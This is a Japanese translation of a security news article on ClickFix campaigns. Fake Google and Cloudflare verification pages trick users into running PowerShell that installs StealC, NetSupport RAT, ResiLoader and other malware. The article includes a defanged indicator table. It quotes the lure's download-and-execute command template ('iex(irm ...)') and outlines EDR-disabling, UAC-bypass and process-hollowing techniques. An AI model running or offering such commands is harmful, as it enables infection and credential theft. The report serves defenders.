Google・Cloudflare認証を装った偽ページ、StealCやHijackLoader、NetSupportマルウェアを拡散

脅威アクターは現在、Googleおよびcloudflareの検証システムを模倣した巧妙なClickFixソーシャルエンジニアリングキャンペーンを悪用し、StealC、HijackLoader、NetSupport RAT、さらに新たに確認されたローダーなど、複数の被害の大きいマルウェアファミリーを配布しています。

最近の脅威インテリジェンス調査によると、これらのキャンペーンは2025年後半から活動しており、ユーザーをだまして悪意あるPowerShellコマンドを手動で実行させています。これにより従来のセキュリティ対策を効果的に回避し、標的システムを完全に侵害することが可能になっています。

この攻撃チェーンは通常、Google reCAPTCHAやGoogle Meetのプロンプト、Cloudflareのセキュリティチェックに似せた「Verify you’re human(人間であることを確認してください)」や「Manual Verification Required(手動検証が必要です)」といった偽ページを利用します。

これらのページは、転用されたドメインや侵害されたウェブサイト、そしてCloudflare Pages(.pages.dev)のインフラ上でホストされています。被害者は次のようなコマンドをコピーして実行するよう指示されます。

powershellpowershell -c "iex(irm '{IP}:{Port}/{Path}')"

これらのコマンドで確認されたポートには、6600、9900、5506、7895、7493、149、8442などがあります。一部のキャンペーンでは、クリップボードインジェクションを通じて動的にペイロードを配信するIClickFixフレームワークも使用されています。

Image

感染プロセスは通常、CustomCaptchaや「SECURITY GATEWAY」フレームワークなどのHTMLテンプレートに埋め込まれた、難読化されたもしくは平文のPowerShellコマンドから始まります。

このフレームワークには、GatewayRuntime、RemoteVault、BeaconDispatcherといったコンポーネントが含まれています。一部の亜種では、攻撃者はペイロードをリアルタイムで選択できる「承認ゲート」を実装しています。

Image

その他の誘導手口としては、偽のGoogleログインアラート、QRコード生成ツール、Google Meetの「fix audio driver(音声ドライバーの修正)」を促すプロンプトなどがあり、/api/driver-clipboard.phpのようなエンドポイントがOS別のペイロードを返す仕組みになっています。

実行されると、PowerShellのダウンローダーはTempディレクトリにtmpXXXX.tmp.ps1という名前のスクリプトを配置します。このスクリプトはC:\ProgramData\Zoomsというディレクトリを作成し、Cloudflare R2バケットまたは攻撃者が管理するIPから第二段階のペイロードをダウンロードします。さらに一部のケースでは、http://{IP}/dl-callbackのようなエンドポイントへホストデータを窃取します。このインフラには一般的にASN Dedik Services Limited、Cloudflare R2ストレージ、そして特徴的な「hehe」というHTTPレスポンスが含まれます。

ペイロードの配布は非常にモジュール化されており、MSIインストーラー、ZIPアーカイブ、実行可能ローダーを通じてマルウェアを配布しています。確認されたペイロードのマッピングには、ResiLoaderとStealCを伴うトロイの木馬化されたElectronベースのFranzアプリケーションを配信するlibEGL.zip、Denoローダーおよび PowerShellスティーラーを展開するTest.msi、Amatera Stealerを配信するarworks.zip、Remusを展開するwater-night.zip、そしてNetSupport RATをインストールするSetup.msiまたはInvintrum_first.msiなどがあります。

その他のペイロードには、CastleLoader(traffic1.msi)やRustベースのスティーラー(ibrowser.exe)があり、いずれもDLLハイジャッキングを介して展開されることが多くなっています。

Image

注目すべき感染チェーンの一つに、トロイの木馬化されたFranzアプリが関与するものがあります。このアプリは、これまで確認されていなかったResiLoaderと呼ばれるローダーをダウンロードします。難読化された.NET NativeAOT DLL(msys-crypto-3.dll)として実装されたこのローダーは、pcdhost.sysドライバーを用いたBYOD(Bring Your Own Driver)技術を使い、140を超えるAV/EDRプロセスを無効化します。

RUNレジストリキーとC:\ProgramData\Google Updateディレクトリを通じて永続化を確立し、ICMLuaUtil COMインターフェースを使ってUACバイパスを実行した上で、最終的にプロセスホロウイングを介してStealCスティーラーをServiceModelReg.exeに注入します。指令サーバー(C2)インフラとの通信はcompletstep[.]comなどのドメインを通じて行われます。

これらのキャンペーンは、onegeekworld[.]comantibotv3[.]comgenerator-qrcode[.]online、複数の.pages.devサブドメインといったドメインに加え、pub-7080e0c20a0e47ca95a476869c532367.r2[.]devのようなCloudflare R2バケットを含む広範なインフラを利用しています。

確認されているペイロード配布用IPには151.240.151[.]12685.239.149[.]1693.152.224[.]29135.181.171[.]40があり、指令サーバー(C2)には146.19.248[.]120(StealC)、popularcard[.]shop(Rustスティーラー)、xzz[.]proxygrid[.]cc(Amatera)が含まれます。関連するマルウェアハッシュには72907d0ca3258365838626f6a8d993a6(ResiLoader)、0234E3188F2883A438B3F2BEAB7A78B2(StealC)、eee416efcb1e33f220cdb4b05496a07a(NetSupport RAT)があります。

このキャンペーンは、エクスプロイトを用いた配布に代わってソーシャルエンジニアリングを活用する、いわゆる「ユーザー支援型実行」手法の有効性が高まっていることを浮き彫りにしています。信頼されたブランドを悪用し、手動での操作を求めることで、攻撃者は検出率を大幅に下げつつ、柔軟な複数ペイロード配布能力を維持しています。

侵害指標(IoC)

種別 指標/値 備考
マルウェア ResiLoader DLL StealCを展開し、BYODドライバーpcdhost.sysを介してAV/EDRを回避する新しい.NET NativeAOTローダー
ハッシュ 72907d0ca3258365838626f6a8d993a6 ClickFix Google/Cloudflareキャンペーンで確認されたResiLoader DLLサンプル
マルウェア StealC プロセスホロウイングによりServiceModelReg.exeに注入される情報窃取型マルウェア
ハッシュ 0234E3188F2883A438B3F2BEAB7A78B2 本キャンペーンに関連するStealCペイロード
マルウェア Remus Stealer Cloudflare R2/IPインフラのwater-night.zip経由で配布
ハッシュ 6a9ac6b3fff7b695dbd4df6ff7f6c516 Remusサンプルのハッシュ
マルウェア Amatera Stealer Zoomsフォルダチェーンのarworks.zip経由で配信
ハッシュ 206ce339febca0c3bcc850f42595fc63 Amatera Stealerのハッシュ
マルウェア NetSupport RAT Setup.msi/Invintrum_first.msi経由でインストール
ハッシュ eee416efcb1e33f220cdb4b05496a07a NetSupportサンプルのハッシュ
マルウェア Rust Stealer ibrowser.exeとして投下、C2はpopularcard[.]shop
ハッシュ b8d53740024d126cb55f83854335a4ab Rustスティーラーのハッシュ
インフラ onegeekworld[.]com, antibotv3[.]com, centralwildcats[.]com, regdev-google[.]com 偽のGoogle/Cloudflare ClickFix認証ページをホスト
インフラ .pages[.]dev (p-floribunds, pg-altirade2, pg-cordivant-m6, g-luminence) 難読化されたSECURITY GATEWAYの誘導手口に使用されるCloudflare Pages
インフラ generator-qrcode[.]online PowerShellによる検証を要求する偽の「My QR Generator」ClickFixサービス
インフラ pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev and other pub-.r2[.]dev buckets ペイロードのZIP/MSIホスティングに使用されるCloudflare R2バケット
インフラ completstep[.]com トロイの木馬化されたFranz/ResiLoaderチェーンで使用されるローダーC2
インフラ 151.240.151[.]126, 85.239.149[.]16, 93.152.224[.]29, 135.181.171[.]40 「powershell iex(irm ‘IP:Port/Path’)」パターンで使用されるペイロード配布用IP
インフラ 146.19.248[.]120 このインフラクラスター内のStealC C2

注記: IPアドレスおよびドメインは、誤った名前解決やハイパーリンク化を防ぐため、意図的に無効化(defang、例: [.])されています。再有効化(re-fang)は、MISP、VirusTotal、あるいは自社のSIEMなど、管理された脅威インテリジェンスプラットフォーム内でのみ行ってください。

Windows、Linux、macOSの仮想マシンでサイバー脅威と対話し、完全な攻撃チェーンを再現 - ANY RUNでマルウェアとフィッシングを分析

翻訳元: https://gbhackers.com/fake-google-and-cloudflare-verification-pages-spread-malware/

ソース: gbhackers.com